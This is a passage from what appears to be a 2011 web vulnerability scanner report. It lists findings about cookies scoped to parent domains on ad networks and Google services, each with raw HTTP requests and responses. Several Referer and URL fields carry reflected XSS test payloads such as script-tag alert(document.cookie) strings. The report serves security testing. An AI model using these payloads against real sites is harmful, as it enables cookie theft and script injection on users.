Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:19:47 GMT
Content-Length: 18077

<!DOCTYPE html>
<!-- Host: as2108 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...

13.63. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1295921988188_58040565_as2108_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1295921988188_58040565_as2108_imp/vew?q=H4sIAAAAAAAAAFWPPW7DMAyFr0KKlCii2jl56BoYOkIB_wjp6CEpPDTJcXqoXqa0kRrtQOC9xw984Pf89bKO5QSUgw-QZEzd04kwCf26zJn4cJpV0kGmpDHlv075cJAZDhJUkVNvY0Fb5uKJEyESpETWxi3wHsiqTtrwsQUh7aGQ2NvQ1nIKXs0M2LnQQEC7AALtnwQEwuh3O9jWQrQLFIi9rdf_LZUVI7JwXUZntK6fg92G86UQAlSESrEC1pArqi_ae3m9T-22PK7WCvmrMYLkhMi2Ps5lmdu9Tcv1MtlQSNl-AMndVvZlAQAA&act=vew&idx=[0]&com=swf&rnd=1295921994463 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://pcdn.tcgmsrv.net/tase/swf/toyota-inmarket/toyota_inmarket_300.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase
ETag: W/"43-1259995862000"
Last-Modified: Sat, 05 Dec 2009 06:51:02 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:19:52 GMT

GIF89a.............!.......,...........D..;

13.64. https://adwords.google.com/select/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • S=awfe=c3-nwyM08wJoLoe4Gp08HQ:awfe-efe=c3-nwyM08wJoLoe4Gp08HQ; Domain=.google.com; Path=/; Secure; HttpOnly
  • S_awfe=7AL-4jBW0TtLsFXXpFfRzA; Domain=.google.com; Path=/; Secure; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=O/umuC0BAAA=.9QCH/JbBItRG1yn60m2UCA==.0IZeB50Usnw8TuDV3HtosQ==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=c3-nwyM08wJoLoe4Gp08HQ:awfe-efe=c3-nwyM08wJoLoe4Gp08HQ; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=7AL-4jBW0TtLsFXXpFfRzA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Mon, 24 Jan 2011 15:01:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

13.65. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • 01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1&V=3-%2fmHdV%2fSxID49%2fY3rKxMK4v+7iK9zQp8Trq285f3hOfOA%2fRinTOf8SX2thSjDHleWAQBFwlhcryU%3d&I=17D7C736696B8AA&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-B80F4175F833E42619203875B6A13D4E1441FE75A7BB1C5368154550679EAB18-CC167F5656F9E658F14A37A7A688219EBE41C044BE8EA8E25C20763073A7C846

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
Expires: Mon, 24 Jan 2011 21:08:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:39 GMT
Connection: close
Set-Cookie: 01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


13.66. http://as2.whdh.com/m/m.php/1295906131129/m.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as2.whdh.com
Path:   /m/m.php/1295906131129/m.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/m.php/1295906131129/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906066204705; path=/
X-Powered-By: PHP/5.1.6
Set-Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com
location: /m/m.php?pass=2&1295906066
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


13.67. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=10660&rnd=1596989115 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAUaMxGSGTK5Wp9qxNESW3w7hCyFHoAAJFcc59Mh0I7lruTfrzkOUgAAAEtaF2gzw--; LO=AAAAAQAUTb0ojsGjTYemMhM8.wPqufZbuW0BAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7MTczLjE5My4yMTQuMjQz; UA=AAAAAQAU6LV_14AmMYMgOwrAn3GlJXyBz.oDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHw1fjUwMDIwsOQwAi2CGBrNwAS2kmFGAesCoBzYHIbNvhAOkA8APJMd4Q--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT


13.68. http://b.collective-media.net/seg/cm/de18_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /seg/cm/de18_1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/cm/de18_1 HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/archives?'"--></style></script><script>alert(0x001E2B)</script>
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.collective-media.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 02:27:23 GMT
Content-Type: image/gif
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.69. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=3005693&rn=575395576&c7=http%3A%2F%2Ftweetmeme.com%2F&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c8=TweetMeme%20-%20Search%20and%20Retweet%20the%20Hottest%20Stories&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 24 Jan 2011 22:20:55 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.70. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=detraderonline&d.x=87575725&d.t=page&d.u=http%3A%2F%2Fwww.traderonline.com%2Fx22ec89d%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E93a08fbf703&d.r=http%3A%2F%2Fburp%2Fshow%2F5 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 24 Jan 2011 15:58:37 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.71. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
  • cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2709&token=TOT09 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/stats.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=gFEcJzqCjXJj

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
Set-Cookie: cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:55:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

13.72. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
  • fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_32728599221&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=728x90&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17101&hrid=39925b34906404a722d1479181f4316b-1295921102&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102; _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_32728599221,o:null,w:10720000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/ja
...[SNIP]...

13.73. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
  • p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_15781025984&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=468x60&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17099&hrid=dda27c0e92ce176b4b94dc8a5861a24c-1295921101&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWQO07DQBRFzzixM_aYW
...[SNIP]...

13.74. http://bid.openx.net/log

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /log

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?l=H4sIAAAAAAAAAGWQO07DQBRFzzixM_aYWIi_AJOCLrKwQ_A4DTQUUIQGsYEopmUDFKFBSNT0bIE10MMqkFgGM_4EIaaZ9-7c0bnvKQRwqOflJC_mWTI-SUfJeJaVyUyP0qRIdV7q7PY414XEmZ4efYS4svrkeHRA0jW1lLgwfJd48PQm6cHdZ4Q0Les4xtk1Ds_oEh9Fn4hV1thih2122WePOMK3fvMU2LtjMA6eIrbNzfV5wIF9Rj4vAga0J8SrE_GbSA-qRPe-TSQWLzaRyC-bRAKvYTkmTb_hOZYnCadnD1f_oeLx9S-0FxDUtYiVGam1h43jS7GyFPuNOFFmulqsNgFuYBa0BGzU5feFYrP1_QBQiO-kpAEAAA==&l_xyz=8_28623 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 42
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;

GIF89a.............!.......,...........D.;

13.75. http://blogsearch.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

13.76. http://books.google.com/bkshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:52 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.77. http://books.google.com/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

